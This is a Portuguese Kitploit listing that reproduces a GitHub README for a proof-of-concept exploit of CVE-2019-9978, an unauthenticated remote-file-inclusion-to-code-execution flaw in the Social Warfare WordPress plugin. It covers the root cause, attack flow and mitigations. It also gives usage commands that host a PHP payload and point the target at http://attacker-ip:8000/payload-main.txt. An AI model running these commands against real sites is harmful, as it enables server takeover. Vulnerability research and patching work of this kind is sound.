Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2019-9978-RCE-PoC — Uma prova de conceito personalizada em Python que demonstra análise de causa raiz e exploração do CVE 2019-9978 (plugin Social Warfare), com foco no fluxo prático de ataque de RFI para RCE. | Kitploit
Ferramentas/GitHubGitHub/vaidehim55/cve-2019-9978-rce-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubvaidehim55/cve-2019-9978-rce-poc

CVE-2019-9978-RCE-PoC

Uma prova de conceito personalizada em Python que demonstra análise de causa raiz e exploração do CVE 2019-9978 (plugin Social Warfare), com foco no fluxo prático de ataque de RFI para RCE.

Ver Repositório
12há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2019-9978 PoC de RCE – Exploit do Plugin Social Warfare para WordPress

Inclusão Remota de Arquivo (RFI) Não Autenticada para Execução Remota de Código (RCE)


📌 Descrição

Este repositório contém uma Prova de Conceito (PoC) baseada em Python que demonstra a exploração da CVE-2019-9978, uma vulnerabilidade crítica no plugin Social Warfare para WordPress.

A vulnerabilidade permite que um atacante não autenticado realize Inclusão Remota de Arquivo (RFI), que pode ser escalada para Execução Remota de Código (RCE)* ao hospedar um payload malicioso em um servidor controlado pelo atacante.

Esta PoC foi desenvolvida e testada em um ambiente de laboratório WordPress controlado, apenas para fins educacionais e de testes de segurança autorizados.


🔍 Resumo da Vulnerabilidade

  • ID da CVE: CVE-2019-9978
  • Componente Afetado: Social Warfare (Plugin WordPress)
  • Versões Afetadas: ≤ 3.5.2
  • Tipo de Vulnerabilidade: Inclusão Remota de Arquivo (RFI)
  • Impacto: Execução Remota de Código (RCE)
  • Autenticação Necessária: Não
  • Vetor de Ataque: Remoto
  • Severidade: Crítica

  • 🧠 Análise da Causa Raiz

    O plugin Social Warfare não valida nem sanitiza adequadamente a entrada fornecida pelo usuário usada para a inclusão remota de conteúdo.
    Como resultado, um atacante pode fornecer uma URL externa maliciosa, levando à inclusão remota de arquivo não autenticada.

    Quando o arquivo remoto incluído contém código PHP executável, ele é executado no contexto do servidor WordPress, resultando em execução remota de código.


    🔄 Fluxo do Ataque

    root@kitploit:~
    
    Unauthenticated HTTP Request
    ↓
    Remote File Inclusion (External URL)
    ↓
    Malicious Payload Execution
    ↓
    Remote Code Execution (RCE)
    
    

    🧪 Prova de Conceito (PoC)

    1. O atacante hospeda um payload malicioso em um servidor HTTP externo
    2. O endpoint vulnerável do Social Warfare inclui o arquivo remoto
    3. O payload é executado no servidor WordPress de destino
    4. O atacante obtém execução remota de comandos
    5. O script de exploit automatiza esse processo para fins de teste e pesquisa

    ▶️ Uso

    Passo 1: Hospede o payload

    root@kitploit:~
    python3 -m http.server 8000
    

    Coloque o arquivo do payload (por exemplo, payload-main.txt) no diretório do servidor.


    Passo 2: Execute o exploit

    root@kitploit:~
    python3 exploit.py <target-site.com> http://attacker-ip:8000/payload-main.txt
    

    🛠 Requisitos

    • Python 3.x
    • Versão vulnerável do plugin Social Warfare para WordPress
    • Ambiente de teste WordPress
    • Servidor HTTP local ou remoto para hospedagem do payload

    🛡 Mitigação e Defesa

    • Atualize o plugin Social Warfare para uma versão corrigida

    • Desative a inclusão remota de arquivos:

      root@kitploit:~
      allow_url_include = Off
      
    • Restrinja o tratamento de URLs externas em plugins WordPress

    • Implante um Firewall de Aplicação Web (WAF) com regras de detecção de RFI


    ⚠️ Aviso Legal

    Este projeto é destinado estritamente a fins educacionais e a testes de segurança autorizados.

    NÃO use esta Prova de Conceito contra sistemas sem permissão explícita. O autor não é responsável por qualquer uso indevido ou dano causado por esta ferramenta.


    🔗 Referências e Créditos

    • Pesquisador Original: Luka Sikic
    • Referência da PoC Original: https://github.com/hash3liZer/CVE-2019-9978
    • Autor / Adaptação: Vaidehi Muluru

    Baixar ferramenta